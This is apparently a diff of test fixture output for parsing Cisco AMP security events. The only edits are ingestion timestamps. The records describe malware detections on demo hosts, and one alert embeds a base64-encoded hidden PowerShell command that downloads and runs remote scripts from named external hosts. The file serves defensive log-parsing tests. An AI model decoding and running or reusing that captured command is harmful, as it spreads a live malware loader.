"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264039066534000,\"timestamp\":1610643346,\"timestamp_nanoseconds\":718000000,\"date\":\"2021-01-14T16:55:46+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419229322845880359\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225761,\"description\":\"Cannot delete\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "code": "2164260893", "kind": "alert", @@ -1673,7 +1673,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:47.010744Z", + "ingested": "2021-12-14T14:40:52.874144640Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264039066534000,\"timestamp\":1610643346,\"timestamp_nanoseconds\":765000000,\"date\":\"2021-01-14T16:55:46+00:00\",\"event_type\":\"Retrospective Quarantine\",\"event_type_id\":553648155,\"detection_id\":\"6419264039066533964\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "code": "553648155", "kind": "alert", @@ -1755,7 +1755,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:47.010749300Z", + "ingested": "2021-12-14T14:40:52.874144990Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264039066534000,\"timestamp\":1610643346,\"timestamp_nanoseconds\":749000000,\"date\":\"2021-01-14T16:55:46+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Gen.20gl.1201\",\"detection_id\":\"6419264039066533964\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"61b9ae415fbe95bf4e6c616ce433cd20dce7dfe3\",\"md5\":\"54a116ff80df6e6031059fc3036464df\"}}}}", "code": "553648147", "kind": "alert", @@ -1839,7 +1839,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:47.010753100Z", + "ingested": "2021-12-14T14:40:52.874145502Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419264039066534000,\"timestamp\":1610643346,\"timestamp_nanoseconds\":702000000,\"date\":\"2021-01-14T16:55:46+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Gen.20gl.1201\",\"detection_id\":\"6419229322845880359\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"61b9ae415fbe95bf4e6c616ce433cd20dce7dfe3\",\"md5\":\"54a116ff80df6e6031059fc3036464df\"}}}}", "code": "553648147", "kind": "alert", @@ -1913,7 +1913,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:47.010757600Z", + "ingested": "2021-12-14T14:40:52.874146026Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412622782676337000,\"timestamp\":1610642101,\"timestamp_nanoseconds\":729000000,\"date\":\"2021-01-14T16:35:01+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6412622782676336648\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", "code": "2164260893", "kind": "alert", @@ -1989,7 +1989,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:47.010762700Z", + "ingested": "2021-12-14T14:40:52.874146472Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412622782676337000,\"timestamp\":1610642101,\"timestamp_nanoseconds\":729000000,\"date\":\"2021-01-14T16:35:01+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6412622782676336647\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", "code": "2164260893", "kind": "alert", @@ -2065,7 +2065,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:47.010767300Z", + "ingested": "2021-12-14T14:40:52.874146834Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412622782676337000,\"timestamp\":1610642101,\"timestamp_nanoseconds\":713000000,\"date\":\"2021-01-14T16:35:01+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6412622782676336646\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", "code": "2164260893", "kind": "alert", @@ -2147,7 +2147,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:47.010771200Z", + "ingested": "2021-12-14T14:40:52.874147434Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412622782676337000,\"timestamp\":1610642101,\"timestamp_nanoseconds\":198000000,\"date\":\"2021-01-14T16:35:01+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D177E09A9A-95.SBX.TG\",\"detection_id\":\"6412622782676336647\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"kepv86368.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\kepv86368.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", "code": "553648147", "kind": "alert", @@ -2227,7 +2227,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:47.010775500Z", + "ingested": "2021-12-14T14:40:52.874147802Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412622782676337000,\"timestamp\":1610642101,\"timestamp_nanoseconds\":198000000,\"date\":\"2021-01-14T16:35:01+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D177E09A9A-95.SBX.TG\",\"detection_id\":\"6412622782676336646\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"uqlq0o884.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\uqlq0o884.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", "code": "553648147", "kind": "alert", @@ -2311,7 +2311,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:47.010780800Z", + "ingested": "2021-12-14T14:40:52.874148156Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412622782676337000,\"timestamp\":1610642101,\"timestamp_nanoseconds\":198000000,\"date\":\"2021-01-14T16:35:01+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D177E09A9A-95.SBX.TG\",\"detection_id\":\"6412622782676336645\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"120C.tmp\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\120C.tmp\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\",\"sha1\":\"f5a171c879b90e77861daf19741b373646d791ff\",\"md5\":\"32c9e6737dbdcbfb7563a3f27e2b1571\"}}}}", "code": "553648147", "kind": "alert", @@ -2395,7 +2395,7 @@ }, "event": { "severity": 3, - "ingested": "2021-12-09T13:35:47.010785200Z", + "ingested": "2021-12-14T14:40:52.874148506Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412622782676337000,\"timestamp\":1610642101,\"timestamp_nanoseconds\":183000000,\"date\":\"2021-01-14T16:35:01+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D177E09A9A-95.SBX.TG\",\"detection_id\":\"6412622782676336644\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"QuotaGroup.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\QuotaGroup\\\\QuotaGroup.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\",\"sha1\":\"92673dd0e5f4a094fa6cd57bb301f884f2289f6c\",\"md5\":\"2f99e3456dc1d26f77c52b2119fde92f\"}}}}", "code": "553648147", "kind": "alert", @@ -2470,7 +2470,7 @@ }, "event": { "severity": 2, - "ingested": "2021-12-09T13:35:47.010789100Z", + "ingested": "2021-12-14T14:40:52.874148917Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6880683125978957000,\"timestamp\":1610640884,\"timestamp_nanoseconds\":810000000,\"date\":\"2021-01-14T16:14:44+00:00\",\"event_type\":\"Threat Detection\",\"event_type_id\":553648222,\"detection\":\"WMIPRVSE Launched Encoded Powershell Command\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_BP_WMIPRVSE\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"be:b0:d5:89:e2:96\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"bp_data\":{\"audit\":false,\"details\":{\"actions\":[{\"action\":\"end_process\",\"end_ts\":1602033881808,\"params\":[\"10724\"],\"start_ts\":1602033881805,\"status\":\"success\"}],\"eng_epoch\":1,\"eng_ver\":\"0.9.0.104\",\"matched_activity\":{\"events\":[{\"process:start\":{\"app\":\"powershell.exe\",\"app_path\":\"C:\\\\Windows\\\\System32\\\\WindowsPowerShell\\\\v1.0\",\"args\":[\"powershell.exe\",\"-NoP\",\"-NonI\",\"-W\",\"Hidden\",\"-E\",\"JABzAGUAPQBAACgAJwB1AHAAZABhAHQAZQAuAHcAaQBuAGQAbwB3AHMAZABlAGYAZQBuAGQAZQByAGgAbwBzAHQALgBjAGwAdQBiACcALAAnAGkAbgBmAG8ALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnACwAJwA4ADcALgAxADIAMQAuADkAOAAuADIAMQA1ACcAKQANAAoAJABuAGkAYwA9ACcAdwB3AHcALgB3AGkAbgBkAG8AdwBzAGQAZQBmAGUAbgBkAGUAcgBoAG8AcwB0AC4AYwBsAHUAYgAnAA0ACgBmAG8AcgBlAGEAYwBoACgAJAB0ACAAaQBuACAAJABzAGUAKQANAAoAewANAAoAIAAgACAAIAAkAHAAaQBuAD0AdABlAHMAdAAtAGMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAHQADQAKACAAIAAgACAAaQBmACAAKAAkAHAAaQBuACAALQBuAGUAIAAkAG4AdQBsAGwAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAJABuAGkAYwA9ACQAdAANAAoAIAAgACAAIAAgACAAIAAgAGIAcgBlAGEAawANAAoAIAAgACAAIAB9AA0ACgB9AA0ACgAkAG4AaQBjAD0AJABuAGkAYwArACIAOgA4ADAAMAAwACIADQAKACQAdgBlAHIAPQAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAHYAZQByAC4AdAB4AHQAIgApAC4AVAByAGkAbQAoACkAIAANAAoAaQBmACgAJAB2AGUAcgAgAC0AbgBlACAAJABuAHUAbABsACkAewAgAA0ACgAgACAAIAAgAGkAZgAoACQAdgBlAHIAIAAtAG4AZQAgACgAWwBXAG0AaQBDAGwAYQBzAHMAXQAgACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApAC4AUAByAG8AcABlAHIAdABpAGUAcwBbACcAdgBlAHIAJwBdAC4AVgBhAGwAdQBlACkAewAgAA0ACgAgACAAIAAgACAAIAAgACAASQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAOgAvAC8AJABuAGkAYwAvAGkAbgBmAG8ANgAuAHAAcwAxACIAKQANAAoAIAAgACAAIAAgACAAIAAgAHIAZQB0AHUAcgBuACAADQAKACAAIAAgACAAfQAgAA0ACgB9AA0ACgAkAHMAdABpAG0AZQA9AFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AA0ACgAkAGYAdQBuAHMAIAA9ACAAKABbAFcAbQBpAEMAbABhAHMAcwBdACAAJwByAG8AbwB0AFwAZABlAGYAYQB1AGwAdAA6AGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkALgBQAHIAbwBwAGUAcgB0AGkAZQBzAFsAJwBmAHUAbgBzACcAXQAuAFYAYQBsAHUAZQAgACAAIAAgACAAIAAgACAADQAKACQAZABlAGYAdQBuAD0AWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJABmAHUAbgBzACkAKQANAAoAaQBlAHgAIAAkAGQAZQBmAHUAbgANAAoADQAKAEcAZQB0AC0AVwBtAGkATwBiAGoAZQBjAHQAIABfAF8ARgBpAGwAdABlAHIAVABvAEMAbwBuAHMAdQBtAGUAcgBCAGkAbgBkAGkAbgBnACAALQBOAGEAbQBlAHMAcABhAGMAZQAgAHIAbwBvAHQAXABzAHUAYgBzAGMAcgBpAHAAdABpAG8AbgAgAHwAIABXAGgAZQByAGUALQBPAGIAagBlAGMAdAAgAHsAJABfAC4AZgBpAGwAdABlAHIAIAAtAG4AbwB0AG0AYQB0AGMAaAAgACcAUwB5AHMAdABlAG0AIABFAHYAZQBuAHQAcwAgAEwAbwBnACcAfQAgAHwAUgBlAG0AbwB2AGUALQBXAG0AaQBPAGIAagBlAGMAdAANAAoAJABkAGkAcgBwAGEAdABoAD0AJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAKwAnAFwAcwB5AHMAdABlAG0AMwAyACcAIAAgACAADQAKAGkAZgAgACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAkAGQAaQByAHAAYQB0AGgAIAApACkAewANAAoACQAkAGQAaQByAHAAYQB0AGgAPQAkAGUAbgB2ADoAUwB5AHMAdABlAG0AUgBvAG8AdAANAAoAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgANAAoAewBzAGUAbgB0AGYAaQBsAGUAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHAAMQAyADAALgBkAGwAbAAnACkAIAAnAHYAYwBwACcAfQANAAoAaQBmACAAKAAhACgAdABlAHMAdAAtAHAAYQB0AGgAIAAoACQAZABpAHIAcABhAHQAaAArACcAXABtAHMAdgBjAHIAMQAyADAALgBkAGwAbAAnACkAKQApAA0ACgB7AHMAZQBuAHQAZgBpAGwAZQAgACgAJABkAGkAcgBwAGEAdABoACsAJwBcAG0AcwB2AGMAcgAxADIAMAAuAGQAbABsACcAKQAgACcAdgBjAHIAJwB9AA0ACgANAAoAWwBhAHIAcgBhAHkAXQAkAHAAcwBpAGQAcwA9ACAAZwBlAHQALQBwAHIAbwBjAGUAcwBzACAALQBuAGEAbQBlACAAcABvAHcAZQByAHMAaABlAGwAbAAgAHwAcwBvAHIAdAAgAGMAcAB1ACAALQBEAGUAcwBjAGUAbgBkAGkAbgBnAHwAIABGAG8AcgBFAGEAYwBoAC0ATwBiAGoAZQBjAHQAIAB7ACQAXwAuAGkAZAB9AA0ACgAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKACQAZQB4AGkAcwB0AD0AJABGAGEAbABzAGUADQAKAGkAZgAgACgAJABwAHMAaQBkAHMAIAAtAG4AZQAgACQAbgB1AGwAbAAgACkADQAKAHsADQAKACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGwAaQBuAGUAIAAtAGUAcQAgACQAbgB1AGwAbAApAA0ACgAgACAAIAAgACAAIAAgACAAewBjAG8AbgB0AGkAbgB1AGUAfQANAAoAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAKAAkAHAAcwBpAGQAcwBbADAAXQAgAC0AZQBxACAAJABsAGkAbgBlAFsALQAxAF0AKQAgAC0AYQBuAGQAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiAEUAUwBUAEEAQgBMAEkAUwBIAEUARAAiACkAIAAtAGEAbgBkACAAKAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAOAAwACAAIgApACAALQBvAHIAIAAkAHQALgBjAG8AbgB0AGEAaQBuAHMAKAAiADoAMQA0ADQANAA0ACIAKQApACAAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAZQB4AGkAcwB0AD0AJAB0AHIAdQBlAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIABiAHIAZQBhAGsADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKAH0ADQAKAEsAaQBsAGwAQgBvAHQAKAAnAGMAbwByAGUAZABwAHUAcwBzAHYAcgAnACkADQAKAGYAbwByAGUAYQBjAGgAIAAoACQAdAAgAGkAbgAgACQAdABjAHAAYwBvAG4AbgApAA0ACgAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAkAGwAaQBuAGUAIAA9ACQAdAAuAHMAcAB